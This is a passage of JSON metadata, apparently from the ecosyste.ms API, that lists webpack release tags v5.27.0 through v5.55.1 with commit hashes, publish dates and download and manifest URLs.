rl":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.1/manifests"},{"name":"v5.55.0","sha":"5db30851c7ed007d8f94150ee2c6a1b47d10d388","kind":"tag","published_at":"2021-09-28T17:39:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.55.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.55.0/manifests"},{"name":"v5.54.0","sha":"45829826701ff6582ea16bc36376d105ff264c26","kind":"tag","published_at":"2021-09-24T19:07:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.54.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.54.0/manifests"},{"name":"v5.53.0","sha":"6796b73a1ab83739f0e722d914676c9dd58d65e2","kind":"tag","published_at":"2021-09-16T13:52:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.53.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.53.0/manifests"},{"name":"v5.52.1","sha":"d95a0418b64bd366f0c51f2635ef0c24158b8bce","kind":"tag","published_at":"2021-09-10T08:55:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.1/manifests"},{"name":"v5.52.0","sha":"4edd3800567f279edd7091af14b3385552a8972f","kind":"tag","published_at":"2021-09-03T15:27:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.52.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.52.0/manifests"},{"name":"v5.51.2","sha":"684e22ec4d6e6221de8a4a8a6b3b8f37b863a09d","kind":"tag","published_at":"2021-09-02T13:24:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.2/manifests"},{"name":"v5.51.1","sha":"d3da48e7e3da3042b7142fe3deced0bcaac3e704","kind":"tag","published_at":"2021-08-19T14:16:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.1/manifests"},{"name":"v5.51.0","sha":"bd7cb37f1c0d872cfff9fc27c7db52a25e1ba6a3","kind":"tag","published_at":"2021-08-19T09:04:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.51.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.51.0/manifests"},{"name":"v5.50.0","sha":"400a0f94ab45ca20b10f219c8311e87d3d3f108c","kind":"tag","published_at":"2021-08-10T18:31:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.50.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.50.0/manifests"},{"name":"v5.49.0","sha":"d3868384c37f9d674d1db17a0198393bd213c763","kind":"tag","published_at":"2021-08-06T11:07:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.49.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.49.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.49.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.49.0/manifests"},{"name":"v5.48.0","sha":"67f3aef3c11e2a8d9e7dc1e0300350588ebd7aec","kind":"tag","published_at":"2021-08-02T12:36:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.48.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.48.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.48.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.48.0/manifests"},{"name":"v5.47.1","sha":"3f353b6ae29ae6d96e0ab86e7233b4c785f99c60","kind":"tag","published_at":"2021-07-29T14:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.1/manifests"},{"name":"v5.47.0","sha":"efeb1287e52870036cc01b22476852205e99c31a","kind":"tag","published_at":"2021-07-27T14:27:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.47.0/manifests"},{"name":"v5.46.0","sha":"a32b0fd041260f3303b9329c9a65cc4afe102390","kind":"tag","published_at":"2021-07-22T10:14:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.46.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.46.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.46.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.46.0/manifests"},{"name":"v5.45.1","sha":"7102df3bb52a33529ff5db4fdf34484d2a359a49","kind":"tag","published_at":"2021-07-16T20:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.1/manifests"},{"name":"v5.45.0","sha":"db52c58a4fb037ece22be6365f56c11bc78fb426","kind":"tag","published_at":"2021-07-16T15:50:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.45.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.45.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.45.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.45.0/manifests"},{"name":"v5.44.0","sha":"f20158d4492e73d07a36cd1614dfbd1dc1ea143d","kind":"tag","published_at":"2021-07-08T19:37:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.44.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.44.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.44.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.44.0/manifests"},{"name":"v5.43.0","sha":"b53a06437a3e8b2756c550c1be6ccb33fdba03d7","kind":"tag","published_at":"2021-07-06T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.43.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.43.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.43.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.43.0/manifests"},{"name":"v5.42.1","sha":"4156b20644d309c0e8acaa1e22ca3a4fe546c0b6","kind":"tag","published_at":"2021-07-05T14:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.1/manifests"},{"name":"v5.42.0","sha":"4fb45402eec7efe1c70e641cab7b24331948ea8d","kind":"tag","published_at":"2021-07-02T07:04:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.42.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.42.0/manifests"},{"name":"v5.41.1","sha":"9ed05afbeaf87442d86863a20a6c30b0ab437fb5","kind":"tag","published_at":"2021-06-29T14:30:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.1/manifests"},{"name":"v5.41.0","sha":"fd5dc9997671b4c4b32d15f722e06079cd5da2db","kind":"tag","published_at":"2021-06-28T16:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.41.0/manifests"},{"name":"v5.40.0","sha":"5d297327bc1f208de16c29f5c9b31d2b8a06bce4","kind":"tag","published_at":"2021-06-21T16:25:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.40.0/manifests"},{"name":"v5.39.1","sha":"e5ccd070f6c18794173d3f2e60445de5bc2f52a2","kind":"tag","published_at":"2021-06-17T10:21:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.1/manifests"},{"name":"v5.39.0","sha":"e9f90450d5d8b4e796e5e0e9674869220ab73bcb","kind":"tag","published_at":"2021-06-14T21:31:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.39.0/manifests"},{"name":"v5.38.1","sha":"487665cb69f7b1f1aac44097124ef8f33cfe247b","kind":"tag","published_at":"2021-05-27T21:12:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.1/manifests"},{"name":"v5.38.0","sha":"daa0f1ed1cebc28c8cc9034f95f3b56e9253ec5e","kind":"tag","published_at":"2021-05-27T12:41:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.38.0/manifests"},{"name":"v5.37.1","sha":"2a5ed4a2dcbe06e852f84a8e7f63145af87cb139","kind":"tag","published_at":"2021-05-19T06:50:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.1/manifests"},{"name":"v5.37.0","sha":"a5821c74568d59a330043900328a018c5d3a4af7","kind":"tag","published_at":"2021-05-10T16:21:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.37.0/manifests"},{"name":"v5.36.2","sha":"0e2e972a2d181c530bb7185278fe5cfc20724c22","kind":"tag","published_at":"2021-04-30T11:48:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.2/manifests"},{"name":"v5.36.1","sha":"e9de77aae42bd8f7d799a21dd16c98206cd170f6","kind":"tag","published_at":"2021-04-28T18:57:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.1/manifests"},{"name":"v5.36.0","sha":"c0a3394ae059ba30c90b7e84c3805dcfd918577d","kind":"tag","published_at":"2021-04-27T09:44:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.36.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.36.0/manifests"},{"name":"v5.35.1","sha":"ed175cd22f89eb9fecd0a70572a3fd0be028e77c","kind":"tag","published_at":"2021-04-23T18:36:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.1/manifests"},{"name":"v5.35.0","sha":"e05935f8969d873a20762767d348256e5ad8fb46","kind":"tag","published_at":"2021-04-21T06:37:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.35.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.35.0/manifests"},{"name":"v5.34.0","sha":"a52263b4537dc5bd954677fc884966b0c11114d4","kind":"tag","published_at":"2021-04-19T14:42:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.34.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.34.0/manifests"},{"name":"v5.33.2","sha":"93ce24d2dc40ee972a2ea5138f3c181563c913fd","kind":"tag","published_at":"2021-04-14T18:31:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.2/manifests"},{"name":"v5.33.1","sha":"7a7d3be25a3db94cb47923d122513726966025cf","kind":"tag","published_at":"2021-04-14T18:08:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.1/manifests"},{"name":"v5.33.0","sha":"7ee3bab88a5f38d4a6356baf93a8c9dfb901b9dc","kind":"tag","published_at":"2021-04-14T17:28:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.33.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.33.0/manifests"},{"name":"v5.32.0","sha":"932950550c85dce4efcaccd7116b4879bfd5f962","kind":"tag","published_at":"2021-04-12T18:54:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.32.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.32.0/manifests"},{"name":"v5.31.2","sha":"cde1b73e12eb8a77eb9ba42e7920c9ec5d29c2c9","kind":"tag","published_at":"2021-04-09T17:52:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.2/manifests"},{"name":"v5.31.1","sha":"34502650252c1f5e2b6e19f3d5afd1fac96f3ec4","kind":"tag","published_at":"2021-04-09T17:07:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.1/manifests"},{"name":"v5.31.0","sha":"b3e26cb5a81087c1b4eadb2e648eb01928c9b3be","kind":"tag","published_at":"2021-04-07T16:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.31.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.31.0/manifests"},{"name":"v5.30.0","sha":"f3dce69e9df5f778fb4850662b0f16f9fd9951d2","kind":"tag","published_at":"2021-04-01T18:45:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.30.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.30.0/manifests"},{"name":"v5.29.0","sha":"0522deb7618636b37acae64f5e3b581c7bbb8fca","kind":"tag","published_at":"2021-04-01T15:39:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.29.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.29.0/manifests"},{"name":"v5.28.0","sha":"15110ea6de0b53c93d697716d17037c41a3c0cd2","kind":"tag","published_at":"2021-03-24T12:35:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.28.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.28.0/manifests"},{"name":"v5.27.2","sha":"1c044bc75be02fcfe78eb6a291f2d107f8ac58eb","kind":"tag","published_at":"2021-03-22T14:40:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.2/manifests"},{"name":"v5.27.1","sha":"69d4e174b96f197ef5d9d8396edaa25178f22725","kind":"tag","published_at":"2021-03-20T19:39:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.27.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.27.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.27.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.27.1/manifests"},{"name":"v5.27.0","sha":"807e69d9647e8605daa815b6b24df8baebaa59b9","kin